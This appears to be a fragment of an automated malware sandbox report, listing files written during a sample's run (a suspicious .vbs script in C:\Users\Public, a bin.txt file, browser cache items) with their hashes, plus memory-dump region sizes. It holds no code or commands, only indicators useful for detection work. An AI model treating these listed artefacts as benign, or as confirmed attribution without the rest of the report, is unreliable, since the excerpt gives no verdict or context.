4800b1f796b94fdd20d5f5d464d40a5229610443256488f1f82ddbaf7e43706e4fb5a2f220a034ce1e8767cc57600d2b455210d286cfd6865f6a9f7a6e3adc3c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_9E586C9C4EFA6BF55193BA5712A132CE

MD5
2c9701f8fc6281ed1a13c8e8d9463d69

SHA1
ae36a69c1b8554f7e89a0ab74753925cf6d0f549

SHA256
c9873fcd93220d6f7cf0bda20b4fbbf24c29b7915638af06b0d69ca84828d9ea

SHA512
e1f42ceda33d6e7fd5cbb3d78060ed23a23a030684df198fabab5069c494baa87972a9b4d4552b4e05369b98b84de3409a980ec8a75eb3d1889e3635a000b2ba

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_DF018E1926302C6B4981E6FB53557FDA

MD5
5fe98101913f5fe3d33eb09861f711dc

SHA1
dea0192f13119692fbbe2f3a7a94dba9a6ff9bae

SHA256
f04f764f20f6177b162153d75506a143e3956f3a510471656eb71a78d0c45640

SHA512
194ab9bd114cd2a9b8ef28bb4ac129164a9be66a15a674280570c020a494b944e831b43627dfbd1bd6614cd2fb268f38b57866a88eb0e296f6e62cc7249c79f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B

MD5
df3ed85a573408f0a18ba1fe6b9d5d0d

SHA1
998a77edc61757d552ac5a8852c2e050cc3a133f

SHA256
20857608991980c77183f0a92ef93cd85d8d0f50b1bd4c1595ee98ef170ab24c

SHA512
626ecd1e1eb594be648b10036c837f2ec29c03f72021b2a5901b279479e474276b4670ae360b63a6745e18401da463e8e4bebdb629fedb7b4c71110588a3da5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\1277698886-ieretrofit[1].js

MD5
cb9af0197f496f52b471a76cfd8d601a

SHA1
067b3ee27f6b49431b5c72791d52f353c577853b

SHA256
da3eb4ab25e02a8dc118febc626df495acd468e84bc0b9767b56e8959b150f99

SHA512
504e25f2e2204d2015236792eadd3c5cf353734e7ea16f500a272b9f915bf1321a10e908cf63873a29b89be5fb28c6aa34cab60f2b977378eb0b91c910dbc783

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\gradients_light[1].png

MD5
4f7de2e6afefb125b1f14fa5cda610ee

SHA1
57a145f234b504a73f9d55cf39f2231a04719456

SHA256
ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044

SHA512
9e3c207f0931ee4c5f48e62670f33d33815cf0779ac5f719017401c20273b4e0403ce03c08643a58ba4c3b023f9c691c34e8fda776b710dfe8ee3dbfee7d887b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NPXJ0CH4\115981500-css_bundle_v2[1].css

MD5
c29aa18d795af74929173ceb3122e759

SHA1
5b39dbf5bbecfc61d844242c136d3f1ceea88d7f

SHA256
22ca5e3dcd26fa66a4af4b4a5d47a6a3a17f4cb9abdd03707901758b28f5c1d6

SHA512
5b83a0f0f0c9977185ff5990033df9c75b348d09e4814c64abf58a9a8c4f41f8e3d636f0119ccb576cc2484f4e133245672596a87a7a8b2fcd56cde08c696c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NPXJ0CH4\body_gradient_tile_light[1].png

MD5
3b2a20d5b0ba4ca0c5dd90865ad6b9c4

SHA1
a90928a16d11d21e112b45b60990a9d7d19cc1d5

SHA256
0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd

SHA512
ef256091ee551337b9789e8d55c558d85af0780c2906fa971a33d36a6f9d78114a573d606dab086816006e072cef7029efe4d47f7bf3be16007ca464f3281765

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NPXJ0CH4\icon18_wrench_allbkg[1].png

MD5
f617effe6d96c15acfea8b2e8aae551f

SHA1
6d676af11ad2e84b620cce4d5992b657cb2d8ab6

SHA256
d172d750493be64a7ed84dec1dd2a0d787ba42f78bc694b0858f152c52b6620b

SHA512
3189a6281ad065848afc700a47bea885cd3905dae11ccb28b88c81d3b28f73f4dfa2d5d1883bb9325dc7729a32aa29b7d1181ae5752df00f6931624b50571986

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\5UX20A97.cookie

MD5
0b606585e33b1c48ce219206bcc6e4d2

SHA1
fa5c584bb69c4db97c16f2e3d2ed31f0abca4bc6

SHA256
61f95908ac78ff539ae08160931a11352000e55db13b73d2b2097d8d75d97e0f

SHA512
c0beee5fdf786e510cd0cecf1f9eca1d9e6435c8c806cfda4869d9ee1f0b88ee7abce263b3372cfa5e07b18ac817e6ca7650ad5a58f0c50434c363cbb016263e

Download Submit
C:\Users\Public\bin.txt

MD5
4837fb18d333d37dda3819cc2b317480

SHA1
56a7606d1a7d7fdf38efb455714313859eeca67b

SHA256
cad7810bbaa703c495f087cd88b46960ade0701842d185705f901e0a35288c29

SHA512
feddde1e7f28d4e7a6d4b018ce030890d9143a0eb772ae84e85bfb8760b85f7472082e70d34506c9afdccad434260fdf74ea0a62937649808115816bf7804baf

Download Submit
C:\Users\Public\bin.txt

MD5
4837fb18d333d37dda3819cc2b317480

SHA1
56a7606d1a7d7fdf38efb455714313859eeca67b

SHA256
cad7810bbaa703c495f087cd88b46960ade0701842d185705f901e0a35288c29

SHA512
feddde1e7f28d4e7a6d4b018ce030890d9143a0eb772ae84e85bfb8760b85f7472082e70d34506c9afdccad434260fdf74ea0a62937649808115816bf7804baf

Download Submit
C:\Users\Public\lulupupugugugagamotherfucker.vbs

MD5
cd54f8707be78bbe0270e07a21bbbd02

SHA1
4977c73cce80117b8e5729a584ab9ff9b509e1bf

SHA256
f7664137ef7bd5aab71e186ec70e564c7b3c18fd9feb210ea4e0c17a00057639

SHA512
54e66909a201d70b03cd10af2f373219274bc9d65a449e2e6ee2b47a4b84bbb4ff39f4ac5f52f14277018d09c4815d6344e47d4448cc44cbbeb27309813b8dc6

Download Submit
memory/576-215-0x0000000000000000-mapping.dmp

Download
memory/1776-197-0x0000000000000000-mapping.dmp

Download
memory/2648-180-0x0000000000000000-mapping.dmp

Download
memory/3120-209-0x0000000000000000-mapping.dmp

Download
memory/3928-181-0x000002A1F2670000-0x000002A1F2672000-memory.dmp

Filesize
8KB

Download
memory/3928-182-0x000002A1F2673000-0x000002A1F2675000-memory.dmp

Filesize
8KB

Download
memory/3928-184-0x000002A1F2676000-0x000002A1F2678000-memory.dmp

Filesize
8KB

Download
memory/3928-185-0x000002A1F2678000-0x000002A1F2679000-memory.dmp

Filesize
4KB

Download
memory/4000-187-0x0000000003100000-0x0000000003101000-memory.dmp

Filesize
4KB

Download
memory/4000-222-0x0000000003101000-0x0000000003102000-memory.dmp

Filesize
4KB

Download
memory/4000-186-0x0000000000437DCE-mapping.dmp

Download
memory/4152-189-0x000000001C762000-0x000000001C764000-memory.dmp

Filesize
8KB

Download
memory/4152-194-0x00007FF6CA730000-0x00007FF6CA731000-memory.dmp

Filesize
4KB

Download
memory/4152-190-0x000000001C764000-0x000000001C765000-memory.dmp

Filesize
4KB

Download
memory/4152-191-0x000000001C765000-0x000000001C766000-memory.dmp

Filesize
4KB

Download
memory/4152-196-0x000000001C768000-0x000000001C76A000-memory.dmp

Filesize
8KB

Download
memory/4152-188-0x000000001C760000-0x000000001C762000-memory.dmp

Filesize
8KB

Download
memory/4152-195-0x000000001C76A000-0x000000001C76F000-memory.dmp

Filesize
20KB

Download
memory/4152-192-0x000000001C766000-0x000000001C767000-memory.dmp

Filesize
4KB

Download
memory/4152-193-0x000000001C767000-0x000000001C768000-memory.dmp

Filesize
4KB

Download
memory/4300-213-0x0000000000000000-mapping.dmp

Download
memory/4372-179-0x0000000000000000-mapping.dmp

Download
memory/4568-183-0x0000000000000000-mapping.dmp

Download
memory/4600-218-0x00000001407102D0-mapping.dmp

Download
memory/4600-221-0x00000000139D0000-0x00000000139F0000-memory.dmp

Filesize
128KB

Download
memory/4600-220-0x0000000002F60000-0x0000000002F80000-memory.dmp

Filesize
128KB

Download
memory/4600-219-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/4656-123-0x00007FFA55350000-0x00007FFA57245000-memory.dmp

Filesize
31.0MB

Download
memory/4656-116-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-115-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-117-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-119-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-118-0x00007FFA5A210000-0x00007FFA5BDED000-memory.dmp

Filesize
27.9MB

Download
memory/4656-122-0x000001CDAEE80000-0x000001CDAFF6E000-memory.dmp

Filesize
16.9MB

Download
memory/4656-114-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download